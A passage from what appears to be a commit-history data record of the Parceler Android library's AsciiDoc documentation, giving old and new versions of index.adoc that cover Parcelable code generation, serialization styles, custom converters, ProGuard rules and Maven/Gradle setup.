Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `ObservableField`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with `@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n @ParcelConstructor Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom_serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the `@ParcelConstructor` annotation:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private final String name;\n private final int age;\n\n @ParcelConstructor\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nIf an empty constructor is present, Parceler will use that constructor unless another constructor is annotated.\n\n==== Mixing getters\/setters and fields\nYou may also mix and match serialization techniques using the `@ParcelProperty` annotation.\nIn the following example, `firstName` and `lastName` are written to the bean using the constructor while `firstName` is read from the bean using the field and `lastName` is read using the `getLastName()` method.\nThe parameters `firstName` and `lastName` are coordinated by the parameter names `\"first\"` and `\"last\"` respectfully.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n @ParcelProperty(\"first\")\n String firstName;\n String lastName;\n\n @ParcelConstructor\n public Example(@ParcelProperty(\"first\") String firstName, @ParcelProperty(\"last\") String lastName){\n this.firstName = firstName;\n this.lastName = lastName;\n }\n\n public String getFirstName() { return firstName; }\n\n @ParcelProperty(\"last\")\n public String getLastName() { return lastName; }\n}\n----\n\nFor attributes that should not be serialized with Parceler, the attribute field, getter or setter may be annotated by `@Transient`.\n\nParceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including the following:\n\n * https:\/\/code.google.com\/p\/google-gson\/[GSON]\n * https:\/\/realm.io\/docs\/java\/latest\/#parceler[Realm]\n * https:\/\/bitbucket.org\/littlerobots\/cupboard[Cupboard]\n * http:\/\/simple.sourceforge.net\/[Simple XML]\n * https:\/\/github.com\/Raizlabs\/DBFlow[DBFlow]\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annotation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue generates a different class than the annotated `@Parcel`, therefore, you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis provides a still cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\nParceler is also packaged with a series of base classes to make Collection conversion easier located under the `org.parceler.converter` package of the api.\nThese base classes take care of a variety of difficult or verbose jobs dealing with Collections including null checks and collectin iteration.\nFor instance, the above `ParcelConverter` could be written using the `ArrayListParcelConverter':\n\n[source,java]\n----\npublic class ItemListParcelConverter extends ArrayListParcelConverter<Item> {\n @Override\n public void itemToParcel(Item item, Parcel parcel) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n\n @Override\n public Item itemFromParcel(Parcel parcel) {\n return Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader()));\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application{\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n\nIn addition, classes referenced by `@ParcelClass` may be configured using the `@Parcel` annotation.\nThis allows the serialization configuration through any parameter available on the `@Parcel` annotation including the serialization technique or classes to analyze.\n\nOne useful technique is the ability to define global custom converters for a type:\n[source,java]\n----\n@ParcelClass(\n value = LibraryParcel.class,\n annotation = @Parcel(converter = LibraryParcelConverter.class))\nclass SomeClass{}\n----\nThis allows for fine grained control over a class that isn't available for direct modification.\n\n=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of what classes in the inheritance hierarchy to analyze via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class parameters.\n\n==== Specific wrapping\n\nThe Parcels utility class looks up the given class for wrapping by class.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as a Example\n----\n\nSecond, one may also specify the class type when using the `Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your proguard configuration file. These will keep files related to the `Parcels` utilty class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parceler library\n-keep interface org.parceler.Parcel\n-keep @org.parceler.Parcel class * { *; }\n-keep class **$$Parcelable { *; }\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile 'org.parceler:parceler-api:{{site.currentVersion}}'\nannotationProcessor 'org.parceler:parceler:{{site.currentVersion}}'\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","old_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\nHave a question? http:\/\/stackoverflow.com\/questions\/ask?tags=parceler[Ask it on StackOverflow.]\n\nFound an issue? https:\/\/github.com\/johncarl81\/parceler\/issues\/new[Please report it.]\n\nimage:https:\/\/badges.gitter.im\/johncarl81\/parceler.svg[link=\"https:\/\/gitter.im\/johncarl81\/parceler?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\"]\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a Parcelable must define a `public static final Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example() {}\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(\"Andy\", 42));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(getIntent().getParcelableExtra(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/MarcinMoskala\/ActivityStarter\/wiki\/Parceler-Arg-Converter-usage[ActivityStarter] - Uses ParcelarArgConverter to allow to use Parceler objects as an arguments passed to Activities (Fragments, Services etc.).\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap `@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n * http:\/\/androidannotations.org\/[AndroidAnnotations] - Autodetects `@Parcel` annotated beans and https:\/\/github.com\/excilys\/androidannotations\/wiki\/ParcelerIntegration[automatically wraps\/unwraps] them when using `@Extra`, `@FragmentArg`, `@InstanceState` and other `Bundle` related annotations.\n\n=== Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `ObservableField`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with `@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n @ParcelConstructor Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom_serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the `@ParcelConstructor` annotation:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private final String name;\n private final int age;\n\n @ParcelConstructor\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nIf an empty constructor is present, Parceler will use that constructor unless another constructor is annotated.\n\n==== Mixing getters\/setters and fields\nYou may also mix and match serialization techniques using the `@ParcelProperty` annotation.\nIn the following example, `firstName` and `lastName` are written to the bean using the constructor while `firstName` is read from the bean using the field and `lastName` is read using the `getLastName()` method.\nThe parameters `firstName` and `lastName` are coordinated by the parameter names `\"first\"` and `\"last\"` respectfully.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n @ParcelProperty(\"first\")\n String firstName;\n String lastName;\n\n @ParcelConstructor\n public Example(@ParcelProperty(\"first\") String firstName, @ParcelProperty(\"last\") String lastName){\n this.firstName = firstName;\n this.lastName = lastName;\n }\n\n public String getFirstName() { return firstName; }\n\n @ParcelProperty(\"last\")\n public String getLastName() { return lastName; }\n}\n----\n\nFor attributes that should not be serialized with Parceler, the attribute field, getter or setter may be annotated by `@Transient`.\n\nParceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including the following:\n\n * https:\/\/code.google.com\/p\/google-gson\/[GSON]\n * https:\/\/realm.io\/docs\/java\/latest\/#parceler[Realm]\n * https:\/\/bitbucket.org\/littlerobots\/cupboard[Cupboard]\n * http:\/\/simple.sourceforge.net\/[Simple XML]\n * https:\/\/github.com\/Raizlabs\/DBFlow[DBFlow]\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annotation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue generates a different class than the annotated `@Parcel`, therefore, you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis provides a still cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\nParceler is also packaged with a series of base classes to make Collection conversion easier located under the `org.parceler.converter` package of the api.\nThese base classes take care of a variety of difficult or verbose jobs dealing with Collections including null checks and collectin iteration.\nFor instance, the above `ParcelConverter` could be written using the `ArrayListParcelConverter':\n\n[source,java]\n----\npublic class ItemListParcelConverter extends ArrayListParcelConverter<Item> {\n @Override\n public void itemToParcel(Item item, Parcel parcel) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n\n @Override\n public Item itemFromParcel(Parcel parcel) {\n return Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader()));\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application{\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n\nIn addition, classes referenced by `@ParcelClass` may be configured using the `@Parcel` annotation.\nThis allows the serialization configuration through any parameter available on the `@Parcel` annotation including the serialization technique or classes to analyze.\n\nOne useful technique is the ability to define global custom converters for a type:\n[source,java]\n----\n@ParcelClass(\n value = LibraryParcel.class,\n annotation = @Parcel(converter = LibraryParcelConverter.class))\nclass SomeClass{}\n----\nThis allows for fine grained control over a class that isn't available for direct modification.\n\n=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of what classes in the inheritance hierarchy to analyze via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class parameters.\n\n==== Specific wrapping\n\nThe Parcels utility class looks up the given class for wrapping by class.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as a Example\n----\n\nSecond, one may also specify the class type when using the `Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your proguard configuration file. These will keep files related to the `Parcels` utilty class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parceler library\n-keep interface org.parceler.Parcel\n-keep @org.parceler.Parcel class * { *; }\n-keep class **$$Parcelable { *; }\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile 'org.parceler:parceler-api:{{site.currentVersion}}'\nannotationProcessor 'org.parceler:parceler:{{site.currentVersion}}'\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9f29ad5fdb4b208f980cb6350e3c517c67ca468a","subject":"updated anchor name","message":"updated anchor name","repos":"johncarl81\/parceler-site,johncarl81\/parceler-site,johncarl81\/parceler-site","old_file":"index.adoc","new_file":"index.adoc","new_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a Parcelable must define a `public final static Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example(){ \/*Required empty bean constructor*\/ }\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(\"Andy\", 42));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(this.getIntent().getExtras().get(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap `@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n\n=== Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with `@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom_serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the `@ParcelConstructor` annotation:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private final String name;\n private final int age;\n\n @ParcelConstructor\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nIf an empty constructor is present, Parceler will 